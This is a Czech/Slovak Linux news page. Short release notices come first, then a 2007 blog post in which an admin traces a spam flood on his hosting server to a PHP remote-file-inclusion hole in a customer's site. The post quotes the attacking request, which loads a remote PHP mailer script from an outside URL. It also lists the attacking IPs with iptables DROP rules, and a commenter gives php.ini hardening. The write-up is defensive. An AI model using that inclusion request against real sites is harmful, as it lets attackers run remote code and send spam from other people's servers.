Od soboty do úterý probíhá v Hamburku konference 39C3 (Chaos Communication Congress) věnovaná také počítačové bezpečnosti nebo hardwaru. Program (jiná verze) slibuje řadu zajímavých přednášek. Streamy a záznamy budou k dispozici na media.ccc.de.
Byl představen nový Xserver Phoenix, kompletně od nuly vyvíjený v programovacím jazyce Zig. Projekt Phoenix si klade za cíl být moderní alternativou k X.Org serveru.
XLibre Xserver byl 21. prosince vydán ve verzi 25.1.0, 'winter solstice release'. Od založení tohoto forku X.Org serveru se jedná o vůbec první novou minor verzi (inkrementovalo se to druhé číslo v číselném kódu verze).
Wayback byl vydán ve verzi 0.3. Wayback je "tak akorát Waylandu, aby fungoval Xwayland". Jedná se o kompatibilní vrstvu umožňující běh plnohodnotných X11 desktopových prostředí s využitím komponent z Waylandu. Cílem je nakonec nahradit klasický server X.Org, a tím snížit zátěž údržby aplikací X11.
Byla vydána verze 4.0.0 programovacího jazyka Ruby (Wikipedie). S Ruby Box a ZJIT. Ruby lze vyzkoušet na webové stránce TryRuby. U příležitosti 30. narozenin, první veřejná verze Ruby 0.95 byla oznámena 21. prosince 1995, proběhl redesign webových stránek.
Všem čtenářkám a čtenářům AbcLinuxu krásné Vánoce.
Byla vydána nová verze 7.0 linuxové distribuce Parrot OS (Wikipedie). S kódovým názvem Echo. Jedná se o linuxovou distribuci založenou na Debianu a zaměřenou na penetrační testování, digitální forenzní analýzu, reverzní inženýrství, hacking, anonymitu nebo kryptografii. Přehled novinek v příspěvku na blogu.
Vývojáři postmarketOS vydali verzi 25.12 tohoto před osmi lety představeného operačního systému pro chytré telefony vycházejícího z optimalizovaného a nakonfigurovaného Alpine Linuxu s vlastními balíčky. Přehled novinek v příspěvku na blogu. Na výběr jsou 4 uživatelská rozhraní: GNOME Shell on Mobile, KDE Plasma Mobile, Phosh a Sxmo.
Byla vydána nová verze 0.41.0 multimediálního přehrávače mpv (Wikipedie) vycházejícího z přehrávačů MPlayer a mplayer2. Přehled novinek, změn a oprav na GitHubu. Požadován je FFmpeg 6.1 nebo novější a také libplacebo 6.338.2 nebo novější.
Byla vydána nová verze 5.5 (novinky) skriptovacího jazyka Lua (Wikipedie). Po pěti a půl letech od vydání verze 5.4.
Dalsia prihoda, ktora zvyraznuje moj odpor ku SPAMu
Ked sme sli s mojou polovickou domov z prace dostal som SMS v zneni:"Caves, nejaky problem so serverom?nejde ani web ani ftp". Nevedel som o koho ide, kedze sa nepodpisal, tak som mu volal spat. Ukazalo sa, ze je to kamarat X!ch. Prislubil som mu, ze ked sa dostanem domov, tak mu na to pozriem. Predpokladal som, ze ma problem on so sietov. Za 10 minut som dostal druhu SMS od kamarata JOHANIATKA. Napisal:"Ahoj. Vypadok servera ...uz je to viac ako hodinu(Len pre info, ci o tom viete). Majo". Pridali sme do kroku s polovickou. Asi sa nieco deje.
Dosiel som domov...pingat server islo...aj SSH siel. Ale pozeral som, ze vsetka RAMka bola zozrata Postfixom a Apachom. Vo vronte Postfixu bolo 25 000 sprav, ktore boli poslane od uzivatela www-data na nezname/neexistujuce adresy. Tak reku, ze niekto sa bavi. Hladal som ale nic som nenasiel. Ked som restartol Apacha, prestali chodit dalsie maily do fronty. Tak som bol spokojny sam zo sebou. Vymazal som maily z fronty a bol pokoj.
Na dalsi ten som robil nieco na pocitaci. Isiel som si cez webmail pozriet svoju postu a na uvitacej stranke Horde som nasiel spravu od servra, ze ma malo miesta na disku. Prihlasim sa ma masinu vidim, ze je plny disk na ktorom su e-maily z fronty Postfixu. Pozriem do fronty a vo fronte 55 000 nedorucenych mailov. Rozhodol som sa hladat co sa uchylak toto robi. Po asi hodine hladania som dosiel na nasledovne veci:
- Pozrel som si server-status pre Apacheho a nasiel som nasledovnu podozrivu linku: DOMENA/main.php?p=http://www.danfortier.com/en/style.txt?. Kuknem na web a co nevidim? V stranke zakaznika je vlozeny formular zo stranky http://www.danfortier.com/en/style.txt. Ked si pozries tu stranku, je to cisty PHP kod na zasielanie mailov.
- Pozeral som logy a dosiel som na 4 IP adresy odkial to spustali: 196.1.176.194, 88.101.234.10, 82.206.131.126 a 195.225.62.76. Samozrejme dostali DROP do iptables:
iptables --list -v -n -t raw
...
46 2804 DROP all -- eth0 * 196.1.176.194 0.0.0.0/0
0 0 DROP all -- eth0 * 88.101.234.10 0.0.0.0/0
0 0 DROP all -- eth0 * 82.206.131.126 0.0.0.0/0
0 0 DROP all -- eth0 * 195.225.62.76 0.0.0.0/0
...
- Poziadal som vyvojara webu (dost znamu firmu) na opravenie diery vo webe, pretoze to moze dospiet az k vypnutiu ich webu.
Takze mili admini, bacha na derave weby, ktore su mozno aj u vas hostovane. Dostanete sa do black-listov bez svojeho zapricinenia a ani neviete ako a zase budete vy ty najhorsi, pretoze zakaznikovi nejde posielat maily 
.
Tiskni
Sdílej:
allow_url_fopen = Offa
allow_url_include = Offv php.ini. Všetky aplikácie na hostingu sa celkom dobre auditovať nedajú, a toto zabráni presne takémuto zneužitiu deravej aplikácie. Je síce potom trošku problematickejšie využívanie off-site zdrojov pre programátorov, ale nie je to nič nezvládnuteľné (namiesto jednoduchého include alebo fopen treba použiť knižnicu CURL).
. Tiež som na tom tak bol a tiež som rozoslal nejaký ten spam :-P.
5.9.2007 14:08
Michal Fecko | skóre: 31
| blog: Poznámkový blog
To fakt není nějaká možnost jak to automaticky zahazovat než to zahltí server?Skusit to zahadzovat pred serverom (nejaky stroj na pred-triedovanie posty) - ale neviem ci sa tym vyriesi "zahltenie"...
5.9.2007 14:56
Luk | skóre: 47
| blog: Kacířské myšlenky
| Kutná Hora
AbcLinuxu.cz
ITBiz.cz
HDmag.cz
AbcPráce.cz